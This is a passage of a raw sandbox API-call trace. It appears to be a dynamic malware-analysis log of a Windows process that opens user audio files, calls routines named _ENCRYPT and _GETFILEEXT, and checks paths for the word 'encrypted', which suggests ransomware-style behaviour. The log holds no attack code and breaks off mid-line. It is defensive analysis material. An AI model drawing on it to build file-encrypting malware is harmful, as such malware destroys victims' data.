HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\y6ubt-qdhh8vkxog3x\\6ydesmadulc.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0038.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0038.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=71, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0038.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8e) returned 0x7c3818 [0038.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=71, lpWideCharStr=0x7c3818, cchWideChar=71 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav") returned 71 [0038.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0038.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0038.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0038.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0038.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0038.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0038.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0038.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0038.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0038.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0038.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0038.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.701] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0038.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.702] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.702] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.702] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0038.702] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.702] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.703] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0038.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.703] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.703] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0038.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0038.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.703] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.703] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0038.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.703] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0038.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0038.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.704] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.704] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.704] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.704] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebd1f00, ftCreationTime.dwHighDateTime=0x1d5bbf4, ftLastAccessTime.dwLowDateTime=0x9a6973d0, ftLastAccessTime.dwHighDateTime=0x1d5bdff, ftLastWriteTime.dwLowDateTime=0x9a6973d0, ftLastWriteTime.dwHighDateTime=0x1d5bdff, nFileSizeHigh=0x0, nFileSizeLow=0x8acf, dwReserved0=0x0, dwReserved1=0x777648, cFileName="6YdESMaDUlc.wav", cAlternateFileName="6YDESM~1.WAV")) returned 0x7c20c0 [0038.704] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.704] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.704] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebd1f00, ftCreationTime.dwHighDateTime=0x1d5bbf4, ftLastAccessTime.dwLowDateTime=0x9a6973d0, ftLastAccessTime.dwHighDateTime=0x1d5bdff, ftLastWriteTime.dwLowDateTime=0x9a6973d0, ftLastWriteTime.dwHighDateTime=0x1d5bdff, nFileSizeHigh=0x0, nFileSizeLow=0x8acf, dwReserved0=0x0, dwReserved1=0x777648, cFileName="6YdESMaDUlc.wav", cAlternateFileName="6YDESM~1.WAV")) returned 0x7c20c0 [0038.704] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0038.705] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 